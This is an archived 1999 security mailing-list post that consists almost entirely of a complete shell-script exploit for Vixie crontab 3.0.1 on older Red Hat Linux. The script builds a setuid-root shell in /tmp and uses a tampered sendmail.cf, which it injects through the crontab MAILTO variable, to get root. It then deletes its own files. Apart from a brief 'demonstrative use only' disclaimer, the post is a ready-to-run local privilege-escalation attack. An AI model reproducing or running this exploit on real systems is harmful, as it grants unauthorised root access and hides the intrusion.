Vixie Crontab exploit code

From: Taeho Oh (ohharaat_private)
Date: Wed Sep 01 1999 - 08:48:29 PDT

Next message: Valentin Nechayev: "Re: Vixie Cron version 3.0pl1 vulnerable to root exploit"

Previous message: Jason Axley: "Re: [Fwd: ISS Security Advisory: Buffer Overflow in Netscape"
Next in thread: rjpat_private: "Re: Vixie Crontab exploit code"
Reply: rjpat_private: "Re: Vixie Crontab exploit code"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

 Vixie Crontab exploit code

begin vixie-ex
----------------------------------------------------------------------
#!/bin/sh


# Vixie crontab exploit
#
# Local user can gain root access.
#
# Tested redhat linux : 4.2, 5.0, 5.1, 6.0
# Tested vixie crontab version : 3.0.1
#
# This program is only for demonstrative use only.
# USE IT AT YOUR OWN RISK!
#
# Programmed by Taeho Oh 1999/08/31
#
# Taeho Oh ( ohharaat_private )                   http://postech.edu/~ohhara
# PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
# PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug


PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH


echo
echo "Taeho Oh ( ohharaat_private )                   http://postech.edu/~ohhara"
echo "PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus"
echo "PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug"
echo


echo make shell
echo
cat > /tmp/sh.c << EOF
#include<unistd.h>
#include<stdlib.h>
int main()
{
	setuid(0);
	setgid(0);
	execl("/bin/sh","sh",0);
	return 0;
}
EOF
echo compile shell
echo
cc -o /tmp/sh /tmp/sh.c || gcc -o /tmp/sh /tmp/sh.c


echo make execute shell script
echo
cat > /tmp/makesh << EOF
#!/bin/sh
chown root /tmp/sh
chgrp root /tmp/sh
chmod 4755 /tmp/sh
EOF
chmod 755 /tmp/makesh


echo hack sendmail.cf
echo
cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1
sed 's/O DefaultUser=8:12/O DefaultUser=0:0/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf
sed 's/P=\/usr\/bin\/procmail/P=\/tmp\/makesh/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf.tmp2
sed 's/A=procmail/A=makesh/g' /tmp/sendmail.cf.tmp2 > /tmp/sendmail.cf.tmp3
cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf
rm -f /tmp/sendmail.cf.tmp1
rm -f /tmp/sendmail.cf.tmp2
rm -f /tmp/sendmail.cf.tmp3


echo make cron file
echo
cat > /tmp/cronfile << EOF
MAILTO=-C/tmp/sendmail.cf `whoami`
* * * * * ls
EOF
echo input cron file
echo
crontab /tmp/cronfile


echo wait for 1 minute
echo
sec=`date +%S`
wait=`expr 65 - $sec`
sleep $wait


echo execute shell
echo
/tmp/sh


echo delete data files
echo
cd /tmp
rm -f sendmail.cf cronfile makesh sh.c
crontab /dev/null
----------------------------------------------------------------------
end vixie-ex

--

Taeho Oh ( ohharaat_private )                   http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug

Next message: Valentin Nechayev: "Re: Vixie Cron version 3.0pl1 vulnerable to root exploit"
Previous message: Jason Axley: "Re: [Fwd: ISS Security Advisory: Buffer Overflow in Netscape"
Next in thread: rjpat_private: "Re: Vixie Crontab exploit code"
Reply: rjpat_private: "Re: Vixie Crontab exploit code"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:01:10 PDT